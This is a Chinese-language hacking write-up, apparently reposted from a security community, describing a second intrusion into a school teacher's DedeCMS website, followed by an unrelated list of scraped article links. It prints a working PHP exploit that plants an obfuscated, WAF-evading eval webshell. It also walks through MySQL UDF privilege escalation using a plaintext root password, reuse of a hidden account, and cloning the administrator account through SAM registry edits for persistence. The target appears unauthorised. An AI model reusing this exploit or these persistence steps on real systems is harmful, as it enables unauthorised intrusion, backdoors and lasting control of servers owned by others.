作者:X_Al3r

来源:i春秋社区

00x01
话说在上次对已经要去的学习进行渗透测试后善良的我把洞丢给了老师(网站出问题了,老师找到我身上,不得不给!!!)为此,我跟老师成为了快乐的好基友,以至于我的权限掉了,这让我非常不开心,于是乎,又进行了二次渗透!并且这次我准备长期维权!

00x02
目标站:www.xxx.com//全程马赛克
Cms:二次开发dedecms
版本:20140814(在自己嘴残的情况下把自己所知道的洞都给说出去了,然后补了。)
使用nikto等工具扫均未果,在准备丢bugscan的时候想起土司大佬的文章,于是乎就开干了。
漏洞文件地址:/plus/flink_add.php

并且exp也已经公布,但是经过我的提醒后老师可能装了360等waf,我需要大致的修改下exp
Exp:

<?php //print_r($_SERVER); $referer = $_SERVER['HTTP_REFERER']; $dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径 //拼接 exp $muma='<'.'?'.'p'.'h'.'p'.' '.'$'.'a'.' '.'='.' '.'''.'b'.'''.';'.' '.'$'.'b'.' '.'='.' '.'P'.'O'.'S'.'T'.'['.'''.'x'.'''.']'.';'.' '.'@'.'e'.'v'.'a'.'l'.'('.'$'.'$'.'a'.')'.';'.' '.'?'.'>'; $exp='tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=rss.php'; $url = $dede_login.$exp; //echo $url; header("location: ".$url); // send mail coder exit(); ?>

这里可以看见$muma哪里的内容为<?php @eval($_POST[‘x’]; )?>然后用’.’分割开来的,按葫芦画瓢,构造一个过waf的一句即可
ps:$muma = '<'.'?'.'p'.'h'.'p'.' '.'$'.'a'.' '.'='.' '.'''.'b'.'''.';'.' '.'$'.'b'.' '.'='.' '.'P'.'O'.'S'.'T'.'['.'''.'x'.'''.']'.';'.' '.'@'.'e'.'v'.'a'.'l'.'('.'$'.'$'.'a'.')'.';'.' '.'?'.'>';
触发的时候会生成一个:include/taglib/rss.php
丢到一个站上准备套路老师(因为有权限写的,老师不会上当了。。。所以用小号还原下当时情况)

看样子已经触发了,访问下文件

文件存在,菜刀连接之~

熟悉的界面,继续寻找mysql root账号,在提权一次

这次pass竟然直接是明文,并且直接就是root,大吃一惊- -# 看来他以为不会再有人进来了,不过挺好,估计内部的洞都没修复。那么不用解释了,上大马,开车

Mysql版本:5.5.35
似乎跟以前没什么两样,那么先找一下路径好用来导出udf

安装路径:D:/MySQL/MySQL Server 5.5/,咦,安装路径变了
好吧,直接提权,先导出dll
导出成功,执行语句
这个版本的马发现导出成功了并不能执行命令,于是乎我又换了一个版本的马

What? 这次连导出也不能?吓得我去看了下目录

以为重命名不可覆盖,我又换了好几个名字发现确实写进去了。

然而却不能调用,于是抽支烟压压惊先
突然,猛地想起,我把web的权限已经提升为管理员了,应该可以直接执行命令

权限给降下来了,表示懵逼- -#    该怎么办呢?
然后,奇迹出现了,我的隐藏用户没被删,直接登陆服务器~~~~(大翻车)

发现没权限,于是乎又开始绕- -#

以管理员运行就有权限了

于是乎开始抓

既然说留权限,那么就克隆一个administrator吧
依次进入注册表HKEY_LOCAL_MACHINE---->SAM---->SAM
默认是没读取权限的

依次单击“查看”菜单----“刷新”,可以看到SAM下面的子项已经出来了。

进入到Users目录

可以看见,administrator对应着01F4

把F值保存一下,在找到guest对应的F值,复制进去就可以了
然后启动下Guset用户就可以了,当然,可以使用ca等工具更快捷

因为用户不能添加到管理组,所以才克隆用户,这个在上次渗透中有提到过。另外就是管理组克隆可以用来创建超级隐藏用户等姿势。

转载于:https://www.cnblogs.com/ichunqiu/p/6210985.html

看我如何复制学院管理员账户并畅游相关推荐

  1. 管理员账户遇到“操作需要管理员权限”解决方法

    有时候,明明已经使用了管理员账户登录了,或当前系统中只有一个账户就是管理员账户,在安装软件或者是对硬盘文件进行操作时,却屡屡提示"需要管理员权限". 对于这个问题,可能是系统设置问 ...

  2. win7中office2016版的word在非管理员账户时无法插入页码问题解决记录

    在管理员账户下,win7安装了某2016精简3in1 版本,感谢 xb21cn 和顽石的改善版! 只是后用普通的users账户登录win7. 出现word 插入页码时,只能显示: office.com ...

  3. 计算机管理员和用户名区别,Administrator记不住?教你自定义管理员账户名称

    如果你在安装Windows的过程中跳过了某些步骤,或者你的系统安装盘来路不明,那么恭喜了,现在你使用的操作系统默认管理员账户肯定是"Administrator"吧?记得住吗?反正超 ...

  4. XP计算机管理员账户隐藏了怎么办,xp administrator隐藏如何找回解决方案

    xp administrator隐藏如何找回解决方案 发布时间:2012-11-28 15:58:30   作者:佚名   我要评论 在Windows XP下,如果建立了一个新的非受限者用户(计算机管 ...

  5. win7 登录界面---管理员账户禁用与显示

    当 win7 管理员账户被禁用或者注册表里设置了"显示除 Administrator 外的所有本地用户名" 而标准用户的权限又不够,不能修改标准用户密码.打开组策略管理器及其它系统 ...

  6. win10新建管理员账户_电脑技巧|Win10家庭版如何开启超级管理员账户

    不知道大家在安装一些特殊的专业软件的时候有没有遇到过电脑提示权限不足,需要管理员权限,否则就无法安装. 这种情况下一般就是该软件需要赋予其特殊的权限,而我们一般用户使用的都是我们注册的个人账户,而不是 ...

  7. 怎么更改计算机用户为管理员账户,Win10如何更改为管理员账户,教您如何更改

    刚刚使用windows10正式版的朋友,由于对新系统太过陌生,所以在操作过程中总会遇到一点困难.比如,有位用户想要安装一些软件,却发现手到了权限的限制,这该怎么办呢?我们可以通过管理员账户来进行安装, ...

  8. win10无法使用内置管理员账户打开应用怎么办

    win10无法使用内置管理员账户打开应用怎么办 听语音 Win10管理员账户Administrator默认关闭和隐藏,就是防止这个高权限账户被"滥用"影响系统安全.不过我们有时候也 ...

  9. win7开启超级管理员账户(Administrator)

    win7开启超级管理员账户(Administrator) 不同于XP系统,Windows7系统据说出于安全的考虑,将超级管理员帐户"Administrator"在登陆界面给隐藏了, ...

最新文章

  1. sentinel使用
  2. 每列大于0的个数_二进制中1的个数(剑指offer第十四天)
  3. json execel xml 互转
  4. 用神经网络分类集合{x|x∈x}与集合{x|x ∉x}
  5. 【数学建模】MATLAB应用实战系列(九十二)-教你怎么挑对象,层次分析法应用案例(附MATLAB代码)
  6. python常考题_Python语言基础考察点:python语言基础常见考题(一)
  7. ffmpeg 时间戳
  8. 深度学习与自然语言处理
  9. 【django学习】request.POST与request.POST.get两者主要区别
  10. 浮点数的运算精度丢失
  11. python并行编程手册 pdf_Python并行编程手册
  12. 8153网卡linux驱动,绿联Type-c千兆网卡RTL8153驱动
  13. 计算机二级的图片尺寸,2021计算机二级照片是几寸 大小千万要记住咯
  14. TOEFL wordlist 17
  15. my97DatePicker选择年、季度、月、周、日(转)
  16. 在双向循环链表中,在p所指的结点之后插入s指针所指的结点,其操作是?
  17. iOS 15提示“此App的开发者需要更新APP以在此IOS版本上正常工作”
  18. JAVAEE和项目开发——JSP详解
  19. Conflux v2.2.0 网络 Hardfork 升级公告
  20. pn532写入手机nfc_NFC的PN532 读写命令格式

热门文章

  1. xshell连接Linux鼠标焦点丢失了,Xshell5连接虚拟机中的Linux的方法以及失败原因解决...
  2. 〖Python零基础入门篇㊾〗- Python中的 os 包
  3. Signing package index... Cannot open file '/home/jello/openwrt/key-build' for reading
  4. layui表格编辑修改session数据
  5. android悬浮框横竖屏切换,Activity如何管理对话框(横竖屏切换保持对话框的最佳办法)...
  6. 《BLIP》-用更干净更多样的数据进行多模态预训练,性能超越CLIP!
  7. Python入门习题大全——名言2
  8. 阿根廷为啥跪了?足球里装芯片、AI系统,2022 年世界杯暗藏哪些“黑科技”?...
  9. 大模型创业:朱啸虎与傅盛的观点碰撞
  10. 数据结构之排序:直接选择排序